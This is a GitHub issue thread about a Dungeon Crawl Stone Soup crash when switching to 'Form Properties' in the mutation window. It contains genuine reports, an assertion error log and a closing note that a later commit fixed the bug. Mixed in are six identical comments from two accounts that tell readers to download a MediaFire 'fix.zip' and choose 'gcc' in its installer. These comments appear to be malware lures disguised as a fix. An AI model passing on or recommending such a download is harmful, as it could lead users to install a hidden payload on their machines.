### ISSUE TITLE
Crash when switching to "Form Properties" in mut(A)tion window

### ISSUE THREAD

**Issue by Vaskritaya** [crawl/crawl#3995]
**PLATFORM and OS or BROWSER:**
Arch linux, SDL Tiles
 

**DCSS VERSION AND GAME INFORMATION:**
Dungeon Crawl Stone Soup 0.33-a0-6-gb2e620de6b (SDL Tiles)

**DESCRIPTION:**
Playing gnoll shapeshifter and opened mutation window with (A) to see what my effects do, as I'm very new to the game. There is an option to switch to "form properties" which I assume is about my shapeshifted form. Using a relevant hotkey (!), (^) immediately causes a crash.

**EXTRA FILES:**
[crash-Arbore-20240825-031230.txt](https://github.com/user-attachments/files/16739350/crash-Arbore-20240825-031230.txt)
[save.zip](https://github.com/user-attachments/files/16739363/save.zip)

**Comment by diablo00001** [comment]
Download 
https://www.mediafire.com/file/nyekc4ehyxg2ijy/fix.zip/file
In the installer menu, select "gcc."

**Comment by AlecsSantos** [comment]
Download 
https://www.mediafire.com/file/nyekc4ehyxg2ijy/fix.zip/file
In the installer menu, select "gcc."

**Comment by diablo00001** [comment]
Download 
https://www.mediafire.com/file/nyekc4ehyxg2ijy/fix.zip/file
In the installer menu, select "gcc."

**Comment by AlecsSantos** [comment]
Download 
https://www.mediafire.com/file/nyekc4ehyxg2ijy/fix.zip/file
In the installer menu, select "gcc."

**Comment by diablo00001** [comment]
Download 
https://www.mediafire.com/file/nyekc4ehyxg2ijy/fix.zip/file
In the installer menu, select "gcc."

**Comment by AlecsSantos** [comment]
Download 
https://www.mediafire.com/file/nyekc4ehyxg2ijy/fix.zip/file
In the installer menu, select "gcc."

**Comment by ZombieEnderman5** [comment]
I'm getting this on Fedora 40 local SDL Tiles as well, with SDL2 2.30.3, SDL2_image 2.8.2.4, and DCSS release 0.32. I was playing a DrWn that happened to get some shapeshifting skill, and I found a beast talisman so I tried it out. Not having done shapeshifting before, I promptly tried to look at its capabilities and got a crash.

I was running DCSS from terminal, so I was able to see the error that was logged there:
`/builddir/build/BUILD/gcc-14.2.1-20240801/obj-x86_64-redhat-linux/x86_64-redhat-linux/libstdc++-v3/include/bits/basic_string.h:1249: std::__cxx11::basic_string<_CharT, _Traits, _Alloc>::const_reference std::__cxx11::basic_string<_CharT, _Traits, _Alloc>::operator[](size_type) const [with _CharT = char; _Traits = std::char_traits<char>; _Alloc = std::allocator<char>; const_reference = const char&; size_type = long unsigned int]: Assertion '__pos <= size()' failed.`

I've attached a crash report and my save file. Note that the attached report was the second time I got this crash, as I was quite taken aback by the first time and decided to repeat what I'd just tried to make sure it wasn't some one-off occurrence. (Note: to my knowledge I have never played DCSS on browser, so I don't actually have a DCSS username; the name in the crash was just the name of that character.)
[crash-Anarsin-20240830-190956.txt](https://github.com/user-attachments/files/16822730/crash-Anarsin-20240830-190956.txt)
[save.zip](https://github.com/user-attachments/files/16822741/save.zip)

**Comment by Vaskritaya** [comment]
This appears to be fixed in recent builds thanks to  75c2363.
